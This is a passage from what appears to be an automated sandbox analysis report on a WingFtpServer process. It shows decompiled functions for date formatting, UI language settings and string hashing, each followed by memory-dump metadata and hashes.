						if(_t272 != 1) {
							if(E03AD9BE4( *_v32 & 0x0000ffff,  &_v24) != 0) {
								_push( &_v12);
								_t282 =  *_v24;
								if( *((intOrPtr*)( *_v24 + 4))() == 0) {
									_push( &_v48);
									L03ACFB80();
									_push(_t360);
									_push(0x3ad8b0f);
									_push( *[fs:eax]);
									 *[fs:eax] = _t363;
									_t306 =  *_v28 & 0x0000ffff;
									E03AD28E0( &_v48, _t282,  *_v28 & 0x0000ffff, _v32, __edi, __fp0);
									if((_v48 & 0xfff) !=  *_v28) {
										E03AD1520(_t306);
									}
									_v9 = E03AD877C(_v28, _v8,  &_v48, _t358, _t360, _t367);
									_pop(_t347);
									 *[fs:eax] = _t347;
									_push(E03AD8D91);
									return E03AD1CA0( &_v48);
								} else {
									if(( *_v28 & 0x0000ffff) == _v12) {
										_t44 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x3bd0766 + _v8 * 2 + _t44) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L03ACFB80();
										_push(_t360);
										_push(0x3ad8a78);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t311 = _v12 & 0x0000ffff;
										E03AD28E0( &_v48, _t282, _v12 & 0x0000ffff, _v28, __edi, __fp0);
										if((_v48 & 0xfff) != _v12) {
											E03AD1520(_t311);
										}
										_t32 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x3bd0766 + _v8 * 2 + _t32) & 0x000000ff;
										_pop(_t355);
										 *[fs:eax] = _t355;
										_push(E03AD8D91);
										return E03AD1CA0( &_v48);
									}
								}
							} else {
								E03AD1618(__ecx);
								goto L41;
							}
						} else {
							_v9 = E03AD84FC(_v8, 0);
							goto L41;
						}
					} else {
						_v9 = E03AD84E8(1, 0);
						L41:
						return _v9 & 0x000000ff;
					}
				}
			}
























                                                                                                                                                                                                  0x03ad8964
                                                                                                                                                                                                  0x03ad8964
                                                                                                                                                                                                  0x03ad8965
                                                                                                                                                                                                  0x03ad8967
                                                                                                                                                                                                  0x03ad896b
                                                                                                                                                                                                  0x03ad896e
                                                                                                                                                                                                  0x03ad8971
                                                                                                                                                                                                  0x03ad8974
                                                                                                                                                                                                  0x03ad897b
                                                                                                                                                                                                  0x03ad8988
                                                                                                                                                                                                  0x03ad8b19
                                                                                                                                                                                                  0x03ad8b1f
                                                                                                                                                                                                  0x03ad8b36
                                                                                                                                                                                                  0x03ad8b58
                                                                                                                                                                                                  0x03ad8b67
                                                                                                                                                                                                  0x03ad8b73
                                                                                                                                                                                                  0x03ad8b7a
                                                                                                                                                                                                  0x03ad8c34
                                                                                                                                                                                                  0x03ad8c41
                                                                                                                                                                                                  0x03ad8cb6
                                                                                                                                                                                                  0x03ad8cc5
                                                                                                                                                                                                  0x03ad8cd1
                                                                                                                                                                                                  0x03ad8cd8
                                                                                                                                                                                                  0x03ad8d8c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ad8cde
                                                                                                                                                                                                  0x03ad8ce8
                                                                                                                                                                                                  0x03ad8d82
                                                                                                                                                                                                  0x03ad8d87
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ad8cea
                                                                                                                                                                                                  0x03ad8ced
                                                                                                                                                                                                  0x03ad8cee
                                                                                                                                                                                                  0x03ad8cf5
                                                                                                                                                                                                  0x03ad8cf6
                                                                                                                                                                                                  0x03ad8cfb
                                                                                                                                                                                                  0x03ad8cfe
                                                                                                                                                                                                  0x03ad8d01
                                                                                                                                                                                                  0x03ad8d0b
                                                                                                                                                                                                  0x03ad8d18
                                                                                                                                                                                                  0x03ad8d1a
                                                                                                                                                                                                  0x03ad8d1a
                                                                                                                                                                                                  0x03ad8d3e
                                                                                                                                                                                                  0x03ad8d43
                                                                                                                                                                                                  0x03ad8d48
                                                                                                                                                                                                  0x03ad8d4b
                                                                                                                                                                                                  0x03ad8d4e
                                                                                                                                                                                                  0x03ad8d5b
                                                                                                                                                                                                  0x03ad8d5b
                                                                                                                                                                                                  0x03ad8ce8
                                                                                                                                                                                                  0x03ad8cb8
                                                                                                                                                                                                  0x03ad8cb8
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ad8cb8
                                                                                                                                                                                                  0x03ad8c43
                                                                                                                                                                                                  0x03ad8c46
                                                                                                                                                                                                  0x03ad8c47
                                                                                                                                                                                                  0x03ad8c4e
                                                                                                                                                                                                  0x03ad8c4f
                                                                                                                                                                                                  0x03ad8c54
                                                                                                                                                                                                  0x03ad8c57
                                                                                                                                                                                                  0x03ad8c5d
                                                                                                                                                                                                  0x03ad8c66
                                                                                                                                                                                                  0x03ad8c75
                                                                                                                                                                                                  0x03ad8c77
                                                                                                                                                                                                  0x03ad8c77
                                                                                                                                                                                                  0x03ad8c8a
                                                                                                                                                                                                  0x03ad8c8f
                                                                                                                                                                                                  0x03ad8c92
                                                                                                                                                                                                  0x03ad8c95
                                                                                                                                                                                                  0x03ad8ca2
                                                                                                                                                                                                  0x03ad8ca2
                                                                                                                                                                                                  0x03ad8b80
                                                                                                                                                                                                  0x03ad8b8a
                                                                                                                                                                                                  0x03ad8c24
                                                                                                                                                                                                  0x03ad8c29
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ad8b8c
                                                                                                                                                                                                  0x03ad8b8f
                                                                                                                                                                                                  0x03ad8b90
                                                                                                                                                                                                  0x03ad8b97
                                                                                                                                                                                                  0x03ad8b98
                                                                                                                                                                                                  0x03ad8b9d
                                                                                                                                                                                                  0x03ad8ba0
                                                                                                                                                                                                  0x03ad8ba3
                                                                                                                                                                                                  0x03ad8bad
                                                                                                                                                                                                  0x03ad8bba
                                                                                                                                                                                                  0x03ad8bbc
                                                                                                                                                                                                  0x03ad8bbc
                                                                                                                                                                                                  0x03ad8be0
                                                                                                                                                                                                  0x03ad8be5
                                                                                                                                                                                                  0x03ad8bea
                                                                                                                                                                                                  0x03ad8bed
                                                                                                                                                                                                  0x03ad8bf0
                                                                                                                                                                                                  0x03ad8bfd
                                                                                                                                                                                                  0x03ad8bfd
                                                                                                                                                                                                  0x03ad8b8a
                                                                                                                                                                                                  0x03ad8b5a
                                                                                                                                                                                                  0x03ad8b5a
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ad8b5a
                                                                                                                                                                                                  0x03ad8b38
                                                                                                                                                                                                  0x03ad8b44
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ad8b44
                                                                                                                                                                                                  0x03ad8b21
                                                                                                                                                                                                  0x03ad8b2a
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ad8b2a
                                                                                                                                                                                                  0x03ad898e
                                                                                                                                                                                                  0x03ad8991
                                                                                                                                                                                                  0x03ad89a8
                                                                                                                                                                                                  0x03ad89ce
                                                                                                                                                                                                  0x03ad89dd
                                                                                                                                                                                                  0x03ad89e9
                                                                                                                                                                                                  0x03ad89f0
                                                                                                                                                                                                  0x03ad8aae
                                                                                                                                                                                                  0x03ad8aaf
                                                                                                                                                                                                  0x03ad8ab6
                                                                                                                                                                                                  0x03ad8ab7
                                                                                                                                                                                                  0x03ad8abc
                                                                                                                                                                                                  0x03ad8abf
                                                                                                                                                                                                  0x03ad8ac5
                                                                                                                                                                                                  0x03ad8ace
                                                                                                                                                                                                  0x03ad8ae1
                                                                                                                                                                                                  0x03ad8ae3
                                                                                                                                                                                                  0x03ad8ae3
                                                                                                                                                                                                  0x03ad8af6
                                                                                                                                                                                                  0x03ad8afb
                                                                                                                                                                                                  0x03ad8afe
                                                                                                                                                                                                  0x03ad8b01
                                                                                                                                                                                                  0x03ad8b0e
                                                                                                                                                                                                  0x03ad89f6
                                                                                                                                                                                                  0x03ad8a00
                                                                                                                                                                                                  0x03ad8a9e
                                                                                                                                                                                                  0x03ad8aa3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ad8a02
                                                                                                                                                                                                  0x03ad8a05
                                                                                                                                                                                                  0x03ad8a06
                                                                                                                                                                                                  0x03ad8a0d
                                                                                                                                                                                                  0x03ad8a0e
                                                                                                                                                                                                  0x03ad8a13
                                                                                                                                                                                                  0x03ad8a16
                                                                                                                                                                                                  0x03ad8a19
                                                                                                                                                                                                  0x03ad8a23
                                                                                                                                                                                                  0x03ad8a34
                                                                                                                                                                                                  0x03ad8a36
                                                                                                                                                                                                  0x03ad8a36
                                                                                                                                                                                                  0x03ad8a5a
                                                                                                                                                                                                  0x03ad8a5f
                                                                                                                                                                                                  0x03ad8a64
                                                                                                                                                                                                  0x03ad8a67
                                                                                                                                                                                                  0x03ad8a6a
                                                                                                                                                                                                  0x03ad8a77
                                                                                                                                                                                                  0x03ad8a77
                                                                                                                                                                                                  0x03ad8a00
                                                                                                                                                                                                  0x03ad89d0
                                                                                                                                                                                                  0x03ad89d0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ad89d0
                                                                                                                                                                                                  0x03ad89aa
                                                                                                                                                                                                  0x03ad89b6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ad89b6
                                                                                                                                                                                                  0x03ad8993
                                                                                                                                                                                                  0x03ad899c
                                                                                                                                                                                                  0x03ad8d91
                                                                                                                                                                                                  0x03ad8d99
                                                                                                                                                                                                  0x03ad8d99
                                                                                                                                                                                                  0x03ad8991

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: edf072323447e974582dd1535f0bb7246aa3c5b4ba7047d22afc7fecd36911db
                                                                                                                                                                                                  • Instruction ID: e81324e492de94c0595eda83bf7805514437bd35f18b8b03763334a9b595695d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: edf072323447e974582dd1535f0bb7246aa3c5b4ba7047d22afc7fecd36911db
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7D17179E002099FCF00EFA8C5918FEB7B9EF49300B5480A7E952AB355D6389A45DB71
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AC3EA8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77threadCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                                                                  			E03AC3EA8(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				short _v536;
				short* _t32;
				intOrPtr* _t47;
				intOrPtr _t56;
				void* _t61;
				intOrPtr _t63;
				void* _t67;

				_v8 = 0;
				_t47 = __edx;
				_t61 = __eax;
				_push(_t67);
				_push(0x3ac3f8b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffdec;
				E03AA9C1C(__edx);
				_v24 =  *(_a4 - 2) & 0x0000ffff;
				_v22 =  *(_a4 - 4) & 0x0000ffff;
				_v18 =  *(_a4 - 6) & 0x0000ffff;
				if(_t61 > 2) {
					E03AAA044( &_v8, L"yyyy");
				} else {
					E03AAA044( &_v8, 0x3ac3fa4);
				}
				_t32 = E03AAA8E4(_v8);
				if(GetDateFormatW(GetThreadLocale(), 4,  &_v24, _t32,  &_v536, 0x200) != 0) {
					E03AAA99C(_t47, 0x100,  &_v536);
					if(_t61 == 1 &&  *((short*)( *_t47)) == 0x30) {
						_t63 =  *_t47;
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 - 4));
						}
						E03AAACBC( *_t47, _t63 - 1, 2, _t47);
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x3ac3f92);
				return E03AA9C1C( &_v8);
			}














                                                                                                                                                                                                  0x03ac3eb5
                                                                                                                                                                                                  0x03ac3eb8
                                                                                                                                                                                                  0x03ac3eba
                                                                                                                                                                                                  0x03ac3ebe
                                                                                                                                                                                                  0x03ac3ebf
                                                                                                                                                                                                  0x03ac3ec4
                                                                                                                                                                                                  0x03ac3ec7
                                                                                                                                                                                                  0x03ac3ecc
                                                                                                                                                                                                  0x03ac3ed8
                                                                                                                                                                                                  0x03ac3ee3
                                                                                                                                                                                                  0x03ac3eee
                                                                                                                                                                                                  0x03ac3ef5
                                                                                                                                                                                                  0x03ac3f0e
                                                                                                                                                                                                  0x03ac3ef7
                                                                                                                                                                                                  0x03ac3eff
                                                                                                                                                                                                  0x03ac3eff
                                                                                                                                                                                                  0x03ac3f22
                                                                                                                                                                                                  0x03ac3f3b
                                                                                                                                                                                                  0x03ac3f4a
                                                                                                                                                                                                  0x03ac3f50
                                                                                                                                                                                                  0x03ac3f5a
                                                                                                                                                                                                  0x03ac3f5e
                                                                                                                                                                                                  0x03ac3f63
                                                                                                                                                                                                  0x03ac3f63
                                                                                                                                                                                                  0x03ac3f70
                                                                                                                                                                                                  0x03ac3f70
                                                                                                                                                                                                  0x03ac3f50
                                                                                                                                                                                                  0x03ac3f77
                                                                                                                                                                                                  0x03ac3f7a
                                                                                                                                                                                                  0x03ac3f7d
                                                                                                                                                                                                  0x03ac3f8a

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,03AC3F8B), ref: 03AC3F2E
                                                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,03AC3F8B), ref: 03AC3F34
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DateFormatLocaleThread
                                                                                                                                                                                                  • String ID: $yyyy
                                                                                                                                                                                                  • API String ID: 3303714858-404527807
                                                                                                                                                                                                  • Opcode ID: 3d8fac35e3e1dae7e13f7dbc9117c3ccc1cd50d28cfe93d80a1ca0371851ef71
                                                                                                                                                                                                  • Instruction ID: 6bd52416d40663ee9e64e34d45c0a25f05468c07800a4e58e68e6aa297888a89
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d8fac35e3e1dae7e13f7dbc9117c3ccc1cd50d28cfe93d80a1ca0371851ef71
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD214F39614658AFDB11DF58C944AAEB3F8EF09710F5184ABE905EF390D7389E40C7A1
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AACC08 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                                                  			E03AACC08(signed short __eax, void* __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				char _v26;
				char _v32;
				void* __ebp;
				void* _t39;
				void* _t55;
				void* _t59;
				short* _t62;
				signed short _t66;
				void* _t67;
				void* _t68;
				signed short _t79;
				void* _t81;

				_t81 = __edx;
				_t66 = __eax;
				_v16 = 0;
				if(__eax !=  *0x3bd5c0c()) {
					_v16 = E03AACBC4( &_v8);
					_t79 = _t66;
					_v20 = 3;
					_t62 =  &_v26;
					do {
						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
						_t79 = (_t79 & 0x0000ffff) >> 4;
						_v20 = _v20 - 1;
						_t62 = _t62 - 2;
					} while (_v20 != 0xffffffff);
					_v24 = 0;
					_v22 = 0;
					 *0x3bd5c08(4,  &_v32,  &_v20);
				}
				_t39 = E03AACBC4( &_v12);
				_t67 = _t39;
				if(_t67 != 0) {
					_t55 = _v12 - 2;
					if(_t55 >= 0) {
						_t59 = _t55 + 1;
						_v20 = 0;
						do {
							if( *((short*)(_t67 + _v20 * 2)) == 0) {
								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
							}
							_v20 = _v20 + 1;
							_t59 = _t59 - 1;
						} while (_t59 != 0);
					}
					E03AAA948(_t81, _t67);
					_t39 = E03AA6EAC(_t67);
				}
				if(_v16 != 0) {
					 *0x3bd5c08(0, 0,  &_v20);
					_t68 = E03AACBC4( &_v12);
					if(_v8 != _v12 || E03AACBA0(_v16, _v12, _t68) != 0) {
						 *0x3bd5c08(8, _v16,  &_v20);
					}
					E03AA6EAC(_t68);
					return E03AA6EAC(_v16);
				}
				return _t39;
			}





















                                                                                                                                                                                                  0x03aacc10
                                                                                                                                                                                                  0x03aacc12
                                                                                                                                                                                                  0x03aacc16
                                                                                                                                                                                                  0x03aacc22
                                                                                                                                                                                                  0x03aacc2c
                                                                                                                                                                                                  0x03aacc2f
                                                                                                                                                                                                  0x03aacc31
                                                                                                                                                                                                  0x03aacc38
                                                                                                                                                                                                  0x03aacc3b
                                                                                                                                                                                                  0x03aacc4c
                                                                                                                                                                                                  0x03aacc52
                                                                                                                                                                                                  0x03aacc55
                                                                                                                                                                                                  0x03aacc58
                                                                                                                                                                                                  0x03aacc5b
                                                                                                                                                                                                  0x03aacc61
                                                                                                                                                                                                  0x03aacc67
                                                                                                                                                                                                  0x03aacc77
                                                                                                                                                                                                  0x03aacc77
                                                                                                                                                                                                  0x03aacc80
                                                                                                                                                                                                  0x03aacc85
                                                                                                                                                                                                  0x03aacc89
                                                                                                                                                                                                  0x03aacc8e
                                                                                                                                                                                                  0x03aacc93
                                                                                                                                                                                                  0x03aacc95
                                                                                                                                                                                                  0x03aacc96
                                                                                                                                                                                                  0x03aacc9d
                                                                                                                                                                                                  0x03aacca5
                                                                                                                                                                                                  0x03aaccaa
                                                                                                                                                                                                  0x03aaccaa
                                                                                                                                                                                                  0x03aaccb0
                                                                                                                                                                                                  0x03aaccb3
                                                                                                                                                                                                  0x03aaccb3
                                                                                                                                                                                                  0x03aacc9d
                                                                                                                                                                                                  0x03aaccba
                                                                                                                                                                                                  0x03aaccc1
                                                                                                                                                                                                  0x03aaccc1
                                                                                                                                                                                                  0x03aaccca
                                                                                                                                                                                                  0x03aaccd4
                                                                                                                                                                                                  0x03aacce2
                                                                                                                                                                                                  0x03aaccea
                                                                                                                                                                                                  0x03aacd07
                                                                                                                                                                                                  0x03aacd07
                                                                                                                                                                                                  0x03aacd0f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aacd17
                                                                                                                                                                                                  0x03aacd21

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetThreadUILanguage.KERNEL32(?,00000000), ref: 03AACC19
                                                                                                                                                                                                  • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 03AACC77
                                                                                                                                                                                                  • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 03AACCD4
                                                                                                                                                                                                  • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 03AACD07
                                                                                                                                                                                                    • Part of subcall function 03AACBC4: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,03AACC85), ref: 03AACBDB
                                                                                                                                                                                                    • Part of subcall function 03AACBC4: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,03AACC85), ref: 03AACBF8
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Thread$LanguagesPreferred$Language
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2255706666-0
                                                                                                                                                                                                  • Opcode ID: 5418c6488aae701f00b72f011a3f267e700d2cf6826fd6c7ecb9da0011f6c0c6
                                                                                                                                                                                                  • Instruction ID: b7e5dfdf8725be7bb4df196910d041baa4cdbdba25788e3ad8d6f109742249e8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5418c6488aae701f00b72f011a3f267e700d2cf6826fd6c7ecb9da0011f6c0c6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC315076A0061A9BDB10EFACC984AEEB7B8EF04314F04456AD551EB390EB749A04CB50
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AC8F24 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                                                                  			E03AC8F24(void* __eax) {
				intOrPtr* __esi;
				void* _t14;
				void* _t19;
				signed int _t24;
				unsigned int _t25;
				signed int _t37;
				void* _t39;
				void* _t42;
				WCHAR* _t43;
				void* _t48;
				WCHAR* _t49;

				_t42 = __eax;
				_push(__eax);
				while(1) {
					asm("rol eax, 0x5");
					__bl =  *__esi;
					if((__bl & 0x00000080) != 0) {
						break;
					}
					if(__bl == 0) {
						_pop(__ecx);
						_pop(__esi);
						return __eax;
					} else {
						if(__bl >= 0x41 && __bl <= 0x5a) {
							__bl = __bl | 0x00000020;
						}
						__al = __al ^ __bl;
						__esi = __esi + 1;
						continue;
					}
					L18:
				}
				_pop(__eax);
				_pop(__esi);
				_push(_t23);
				_push(_t42);
				_t49 = _t48 + 0xfffffdf8;
				_t24 = 0;
				_t46 = E03AAA0EC(0);
				_t39 = E03AAF334(0xfde9, 0, 0, 0, 0, _t7);
				if(_t39 <= 0x104) {
					_t43 = _t49;
				} else {
					_t43 = E03AA6E90(_t39 + _t39);
				}
				E03AAF334(0xfde9, _t24, 0, _t39, _t43, _t46);
				CharUpperW(_t43);
				_t25 = 0;
				_t14 = _t39 - 1;
				if(_t14 >= 0) {
					_t19 = _t14 + 1;
					_t37 = 0;
					do {
						_t25 = (_t25 << 0x00000005 | _t25 >> 0x0000001b) ^ _t43[_t37] & 0x0000ffff;
						_t37 = _t37 + 1;
						_t19 = _t19 - 1;
					} while (_t19 != 0);
				}
				if(_t43 != _t49) {
					E03AA6EAC(_t43);
				}
				return _t25;
				goto L18;
			}














                                                                                                                                                                                                  0x03ac8f26
                                                                                                                                                                                                  0x03ac8f2a
                                                                                                                                                                                                  0x03ac8f2b
                                                                                                                                                                                                  0x03ac8f2b
                                                                                                                                                                                                  0x03ac8f2e
                                                                                                                                                                                                  0x03ac8f33
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ac8f38
                                                                                                                                                                                                  0x03ac8f4c
                                                                                                                                                                                                  0x03ac8f4e
                                                                                                                                                                                                  0x03ac8f4f
                                                                                                                                                                                                  0x03ac8f3a
                                                                                                                                                                                                  0x03ac8f3d
                                                                                                                                                                                                  0x03ac8f44
                                                                                                                                                                                                  0x03ac8f44
                                                                                                                                                                                                  0x03ac8f47
                                                                                                                                                                                                  0x03ac8f49
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ac8f49
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ac8f38
                                                                                                                                                                                                  0x03ac8f50
                                                                                                                                                                                                  0x03ac8f52
                                                                                                                                                                                                  0x03ac8e90
                                                                                                                                                                                                  0x03ac8e91
                                                                                                                                                                                                  0x03ac8e94
                                                                                                                                                                                                  0x03ac8e9a
                                                                                                                                                                                                  0x03ac8ea3
                                                                                                                                                                                                  0x03ac8eb8
                                                                                                                                                                                                  0x03ac8ec0
                                                                                                                                                                                                  0x03ac8ecf
                                                                                                                                                                                                  0x03ac8ec2
                                                                                                                                                                                                  0x03ac8ecb
                                                                                                                                                                                                  0x03ac8ecb
                                                                                                                                                                                                  0x03ac8edd
                                                                                                                                                                                                  0x03ac8ee3
                                                                                                                                                                                                  0x03ac8ee8
                                                                                                                                                                                                  0x03ac8eec
                                                                                                                                                                                                  0x03ac8eef
                                                                                                                                                                                                  0x03ac8ef1
                                                                                                                                                                                                  0x03ac8ef2
                                                                                                                                                                                                  0x03ac8ef4
                                                                                                                                                                                                  0x03ac8f04
                                                                                                                                                                                                  0x03ac8f06
                                                                                                                                                                                                  0x03ac8f07
                                                                                                                                                                                                  0x03ac8f07
                                                                                                                                                                                                  0x03ac8ef4
                                                                                                                                                                                                  0x03ac8f0e
                                                                                                                                                                                                  0x03ac8f12
                                                                                                                                                                                                  0x03ac8f12
                                                                                                                                                                                                  0x03ac8f23
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CharUpperW.USER32(?,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00000000,03ACC82B,00000000,03ACC97B), ref: 03AC8EE3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
